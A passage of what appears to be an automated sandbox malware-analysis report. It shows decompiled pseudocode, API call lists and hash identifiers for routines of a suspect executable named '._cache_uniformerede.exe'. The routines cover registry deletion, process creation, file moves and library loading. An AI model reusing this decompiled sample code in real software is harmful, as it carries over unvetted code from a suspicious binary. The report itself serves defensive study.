                                                                                                                                                                                                                            • Associated: 00000007.00000002.531563073.000000000040A000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531808710.0000000000422000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531838733.0000000000427000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531879279.0000000000435000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531979945.000000000046B000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_400000_UNK_.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: MessageSend
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3850602802-0
                                                                                                                                                                                                                            • Opcode ID: 09e122a9c5ca6d14e20a0c17f6d9bb0c47d9e5f073d0cae9cf8d248ab6fa9320
                                                                                                                                                                                                                            • Instruction ID: af17251ef12b8b272b5eaf8d1bef107274ce64b6e67bb2dd4604cf2723900e86
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 09e122a9c5ca6d14e20a0c17f6d9bb0c47d9e5f073d0cae9cf8d248ab6fa9320
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6F012831724220EBEB295B389D05B6A3698E710714F10857FF855F76F1E678CC029B6D
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E00402434(void* __ebx) {
                                                                                                                                                                                                                            				long _t7;
                                                                                                                                                                                                                            				void* _t14;
                                                                                                                                                                                                                            				long _t18;
                                                                                                                                                                                                                            				intOrPtr _t20;
                                                                                                                                                                                                                            				void* _t22;
                                                                                                                                                                                                                            				void* _t23;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t14 = __ebx;
                                                                                                                                                                                                                            				_t26 =  *(_t23 - 0x20) - __ebx;
                                                                                                                                                                                                                            				_t20 =  *((intOrPtr*)(_t23 - 0x2c));
                                                                                                                                                                                                                            				if( *(_t23 - 0x20) != __ebx) {
                                                                                                                                                                                                                            					_t7 = E00402E64(_t20, E00402DA6(0x22),  *(_t23 - 0x20) >> 1); // executed
                                                                                                                                                                                                                            					_t18 = _t7;
                                                                                                                                                                                                                            					goto L4;
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					_t22 = E00402DE6(_t26, 2);
                                                                                                                                                                                                                            					if(_t22 == __ebx) {
                                                                                                                                                                                                                            						L6:
                                                                                                                                                                                                                            						 *((intOrPtr*)(_t23 - 4)) = 1;
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						_t18 = RegDeleteValueW(_t22, E00402DA6(0x33));
                                                                                                                                                                                                                            						RegCloseKey(_t22);
                                                                                                                                                                                                                            						L4:
                                                                                                                                                                                                                            						if(_t18 != _t14) {
                                                                                                                                                                                                                            							goto L6;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t23 - 4));
                                                                                                                                                                                                                            				return 0;
                                                                                                                                                                                                                            			}










                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 00402456
                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 0040245F
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000007.00000002.531367159.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531329224.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531503317.0000000000408000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531563073.000000000040A000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531808710.0000000000422000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531838733.0000000000427000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531879279.0000000000435000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531979945.000000000046B000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_400000_UNK_.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CloseDeleteValue
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2831762973-0
                                                                                                                                                                                                                            • Opcode ID: a682439353b3c5ec41a25a423dd0a89c01db2d1f450957e818456085bf78355d
                                                                                                                                                                                                                            • Instruction ID: 27a137a867c600d8965633a271772258b7302ea9b92edfc7e4bdeed26dcbc29b
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a682439353b3c5ec41a25a423dd0a89c01db2d1f450957e818456085bf78355d
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 54F06272A04120EBDB11ABB89B4DAAD72A9AF44354F15443BE141B71C0DAFC5D05866E
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • ShowWindow.USER32(00000000,00000000), ref: 00401EFC
                                                                                                                                                                                                                            • EnableWindow.USER32(00000000,00000000), ref: 00401F07
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000007.00000002.531367159.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531329224.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531503317.0000000000408000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531563073.000000000040A000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531808710.0000000000422000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531838733.0000000000427000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531879279.0000000000435000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531979945.000000000046B000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_400000_UNK_.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Window$EnableShow
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1136574915-0
                                                                                                                                                                                                                            • Opcode ID: d682e64da976263d74778dcd61bd470f9ad8341d2b96c4d867934af8fae03e48
                                                                                                                                                                                                                            • Instruction ID: 74d914ea4967392a65d1c9fdd8f91c6329c2dde8704c14122971abf6b6e16597
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d682e64da976263d74778dcd61bd470f9ad8341d2b96c4d867934af8fae03e48
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 14E0D872908201CFE705EBA4EE485AD73F0EF40315710097FE401F11D0DBB54C00862D
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E00405C4B(WCHAR* _a4) {
                                                                                                                                                                                                                            				struct _PROCESS_INFORMATION _v20;
                                                                                                                                                                                                                            				int _t7;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				0x426750->cb = 0x44;
                                                                                                                                                                                                                            				_t7 = CreateProcessW(0, _a4, 0, 0, 0, 0x4000000, 0, 0, 0x426750,  &_v20); // executed
                                                                                                                                                                                                                            				if(_t7 != 0) {
                                                                                                                                                                                                                            					CloseHandle(_v20.hThread);
                                                                                                                                                                                                                            					return _v20.hProcess;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				return _t7;
                                                                                                                                                                                                                            			}






                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000007.00000002.531367159.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000007.00000002.531329224.0000000000400000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000007.00000002.531503317.0000000000408000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000007.00000002.531563073.000000000040A000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000007.00000002.531808710.0000000000422000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000007.00000002.531838733.0000000000427000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000007.00000002.531879279.0000000000435000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000007.00000002.531979945.000000000046B000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_400000_UNK_.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CloseCreateHandleProcess
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3712363035-0
                                                                                                                                                                                                                            • Opcode ID: ab61a979a714f7ec4effc1a78875f568a822f35fd178278bd28005db307d5d14
                                                                                                                                                                                                                            • Instruction ID: 91309136e62a13352d93043ad9bb7922807806bb2ea2f765c8e9c4a894a003d9
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ab61a979a714f7ec4effc1a78875f568a822f35fd178278bd28005db307d5d14
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 59E0B6B4600209BFFB109B64EE09F7B7BADFB04648F414565BD51F2190D778A8158A78
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E00406A35(signed int _a4) {
                                                                                                                                                                                                                            				struct HINSTANCE__* _t5;
                                                                                                                                                                                                                            				signed int _t10;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t10 = _a4 << 3;
                                                                                                                                                                                                                            				_t8 =  *(_t10 + 0x40a410);
                                                                                                                                                                                                                            				_t5 = GetModuleHandleA( *(_t10 + 0x40a410));
                                                                                                                                                                                                                            				if(_t5 != 0) {
                                                                                                                                                                                                                            					L2:
                                                                                                                                                                                                                            					return GetProcAddress(_t5,  *(_t10 + 0x40a414));
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_t5 = E004069C5(_t8); // executed
                                                                                                                                                                                                                            				if(_t5 == 0) {
                                                                                                                                                                                                                            					return 0;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				goto L2;
                                                                                                                                                                                                                            			}






                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetModuleHandleA.KERNEL32(?,00000020,?,00403750,0000000B), ref: 00406A47
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00406A62
                                                                                                                                                                                                                              • Part of subcall function 004069C5: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004069DC
                                                                                                                                                                                                                              • Part of subcall function 004069C5: wsprintfW.USER32 ref: 00406A17
                                                                                                                                                                                                                              • Part of subcall function 004069C5: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406A2B
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000007.00000002.531367159.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000007.00000002.531329224.0000000000400000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000007.00000002.531503317.0000000000408000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000007.00000002.531563073.000000000040A000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000007.00000002.531808710.0000000000422000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000007.00000002.531838733.0000000000427000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000007.00000002.531879279.0000000000435000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000007.00000002.531979945.000000000046B000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_400000_UNK_.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2547128583-0
                                                                                                                                                                                                                            • Opcode ID: 2c5be687f5fa61a336a49914f64a515c5dfea5ee9312c993601bf5eaa599f6ad
                                                                                                                                                                                                                            • Instruction ID: 0464b4a7853edb7079d0776797c383171681067eb8499b99987f1e8ea9f8efb8
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2c5be687f5fa61a336a49914f64a515c5dfea5ee9312c993601bf5eaa599f6ad
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E0E086727042106AD210A6745D08D3773E8ABC6711307883EF557F2040D738DC359A79
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 68%
                                                                                                                                                                                                                            			E00406158(WCHAR* _a4, long _a8, long _a12) {
                                                                                                                                                                                                                            				signed int _t5;
                                                                                                                                                                                                                            				void* _t6;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t5 = GetFileAttributesW(_a4); // executed
                                                                                                                                                                                                                            				asm("sbb ecx, ecx");
                                                                                                                                                                                                                            				_t6 = CreateFileW(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
                                                                                                                                                                                                                            				return _t6;
                                                                                                                                                                                                                            			}






                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetFileAttributesW.KERNELBASE(00000003,00403113,C:\Users\user\Desktop\._cache_uniformerede.exe,80000000,00000003), ref: 0040615C
                                                                                                                                                                                                                            • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040617E
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000007.00000002.531367159.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000007.00000002.531329224.0000000000400000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000007.00000002.531503317.0000000000408000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000007.00000002.531563073.000000000040A000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000007.00000002.531808710.0000000000422000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000007.00000002.531838733.0000000000427000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000007.00000002.531879279.0000000000435000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000007.00000002.531979945.000000000046B000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_400000_UNK_.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: File$AttributesCreate
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 415043291-0
                                                                                                                                                                                                                            • Opcode ID: bc48b18717e6d0ecb647aea7fc0ab07bebcbb2e2e3a0bd9572a83b91cd6509df
                                                                                                                                                                                                                            • Instruction ID: 0e1b57c135d9ed337dcee0f1630d7a3ffd6699826ab823f4ff8c6da5104765b0
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bc48b18717e6d0ecb647aea7fc0ab07bebcbb2e2e3a0bd9572a83b91cd6509df
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DCD09E71254201AFEF0D8F20DF16F2E7AA2EB94B04F11952CB682940E1DAB15C15AB19
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E00406133(WCHAR* _a4) {
                                                                                                                                                                                                                            				signed char _t3;
                                                                                                                                                                                                                            				signed char _t7;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t3 = GetFileAttributesW(_a4); // executed
                                                                                                                                                                                                                            				_t7 = _t3;
                                                                                                                                                                                                                            				if(_t7 != 0xffffffff) {
                                                                                                                                                                                                                            					SetFileAttributesW(_a4, _t3 & 0x000000fe);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				return _t7;
                                                                                                                                                                                                                            			}






                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetFileAttributesW.KERNELBASE(?,?,00405D38,?,?,00000000,00405F0E,?,?,?,?), ref: 00406138
                                                                                                                                                                                                                            • SetFileAttributesW.KERNEL32(?,00000000), ref: 0040614C
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000007.00000002.531367159.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000007.00000002.531329224.0000000000400000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000007.00000002.531503317.0000000000408000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000007.00000002.531563073.000000000040A000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000007.00000002.531808710.0000000000422000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000007.00000002.531838733.0000000000427000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000007.00000002.531879279.0000000000435000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000007.00000002.531979945.000000000046B000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_400000_UNK_.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: AttributesFile
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3188754299-0
                                                                                                                                                                                                                            • Opcode ID: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                                                                                                                                                                                                                            • Instruction ID: 3e6336b5c460747e2e1e0fbe3c4db8defb42c0044e1a92967a1d29a512d2a4bc
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 73D0C972514130ABC2102728AE0889ABB56EB64271B014A35F9A5A62B0CB304C628A98
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E00405C16(WCHAR* _a4) {
                                                                                                                                                                                                                            				int _t2;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t2 = CreateDirectoryW(_a4, 0); // executed
                                                                                                                                                                                                                            				if(_t2 == 0) {
                                                                                                                                                                                                                            					return GetLastError();
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				return 0;
                                                                                                                                                                                                                            			}





                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • CreateDirectoryW.KERNELBASE(?,00000000,00403633,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00405C1C
                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 00405C2A
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000007.00000002.531367159.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000007.00000002.531329224.0000000000400000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000007.00000002.531503317.0000000000408000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000007.00000002.531563073.000000000040A000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000007.00000002.531808710.0000000000422000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000007.00000002.531838733.0000000000427000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000007.00000002.531879279.0000000000435000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000007.00000002.531979945.000000000046B000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_400000_UNK_.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CreateDirectoryErrorLast
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1375471231-0
                                                                                                                                                                                                                            • Opcode ID: 3d774f31bfc7c5d70b6f8c035fc875d1b29c99f0800ffc9da4ab7b914865a185
                                                                                                                                                                                                                            • Instruction ID: 66e62c5d6c7775ff4cea72667941029308d228c48495a605f612c1d2d9e1fc74
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3d774f31bfc7c5d70b6f8c035fc875d1b29c99f0800ffc9da4ab7b914865a185
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FBC04C31218605AEE7605B219F0CB177A94DB50741F114839E186F40A0DA788455D92D
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 70%
                                                                                                                                                                                                                            			E0040167B() {
                                                                                                                                                                                                                            				int _t7;
                                                                                                                                                                                                                            				void* _t13;
                                                                                                                                                                                                                            				void* _t15;
                                                                                                                                                                                                                            				void* _t20;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t18 = E00402DA6(0xffffffd0);
                                                                                                                                                                                                                            				_t16 = E00402DA6(0xffffffdf);
                                                                                                                                                                                                                            				E00402DA6(0x13);
                                                                                                                                                                                                                            				_t7 = MoveFileW(_t4, _t5); // executed
                                                                                                                                                                                                                            				if(_t7 == 0) {
                                                                                                                                                                                                                            					if( *((intOrPtr*)(_t20 - 0x28)) == _t13 || E0040699E(_t18) == 0) {
                                                                                                                                                                                                                            						 *((intOrPtr*)(_t20 - 4)) = 1;
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						E00406428(_t15, _t18, _t16);
                                                                                                                                                                                                                            						_push(0xffffffe4);
                                                                                                                                                                                                                            						goto L5;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					_push(0xffffffe3);
                                                                                                                                                                                                                            					L5:
                                                                                                                                                                                                                            					E00401423();
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t20 - 4));
                                                                                                                                                                                                                            				return 0;
                                                                                                                                                                                                                            			}








                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • MoveFileW.KERNEL32(00000000,00000000), ref: 00401696
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000007.00000002.531367159.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531329224.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531503317.0000000000408000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531563073.000000000040A000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531808710.0000000000422000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531838733.0000000000427000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531879279.0000000000435000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531979945.000000000046B000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_400000_UNK_.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: FileMove
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3562171763-0
                                                                                                                                                                                                                            • Opcode ID: 26fbc70d2e8597573122cea31dc6bfba5e45494ce0a55dbc8012e9dd9e1a121d
                                                                                                                                                                                                                            • Instruction ID: be669950fb77a2d656db840ba494943e65029fea8fad8f9acd4f4e8736b9b328
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 26fbc70d2e8597573122cea31dc6bfba5e45494ce0a55dbc8012e9dd9e1a121d
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 62F0BB31A08120E7CB11BBB55F4DE5E2154DF83364F24023FF011B11D1D9BDC95255AE
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E004023B2(int __eax, WCHAR* __ebx) {
                                                                                                                                                                                                                            				WCHAR* _t11;
                                                                                                                                                                                                                            				WCHAR* _t13;
                                                                                                                                                                                                                            				void* _t17;
                                                                                                                                                                                                                            				int _t21;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t11 = __ebx;
                                                                                                                                                                                                                            				_t5 = __eax;
                                                                                                                                                                                                                            				_t13 = 0;
                                                                                                                                                                                                                            				if(__eax != __ebx) {
                                                                                                                                                                                                                            					__eax = E00402DA6(__ebx);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				if( *((intOrPtr*)(_t17 - 0x2c)) != _t11) {
                                                                                                                                                                                                                            					_t13 = E00402DA6(0x11);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				if( *((intOrPtr*)(_t17 - 0x20)) != _t11) {
                                                                                                                                                                                                                            					_t11 = E00402DA6(0x22);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_t5 = WritePrivateProfileStringW(0, _t13, _t11, E00402DA6(0xffffffcd)); // executed
                                                                                                                                                                                                                            				_t21 = _t5;
                                                                                                                                                                                                                            				if(_t21 == 0) {
                                                                                                                                                                                                                            					 *((intOrPtr*)(_t17 - 4)) = 1;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t17 - 4));
                                                                                                                                                                                                                            				return 0;
                                                                                                                                                                                                                            			}








                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 004023E9
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000007.00000002.531367159.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531329224.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531503317.0000000000408000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531563073.000000000040A000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531808710.0000000000422000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531838733.0000000000427000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531879279.0000000000435000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531979945.000000000046B000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_400000_UNK_.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: PrivateProfileStringWrite
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 390214022-0
                                                                                                                                                                                                                            • Opcode ID: 498f41ba95d1dc934bc83887be66b3af98def7cf3aba53834c7129a1bd888199
                                                                                                                                                                                                                            • Instruction ID: de4cb5ca612a6b97b91745c8380e1d92b079ec7b797fcdaf288f77766e75fad7
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 498f41ba95d1dc934bc83887be66b3af98def7cf3aba53834c7129a1bd888199
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FAE04F31900124BBDF603AB11F8DEAE205C6FC6744B18013EF911BA1C2E9FC8C4146AD
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E00406503(void* __eflags, intOrPtr _a4, short* _a8, int _a12, void** _a16) {
                                                                                                                                                                                                                            				void* _t7;
                                                                                                                                                                                                                            				long _t8;
                                                                                                                                                                                                                            				void* _t9;
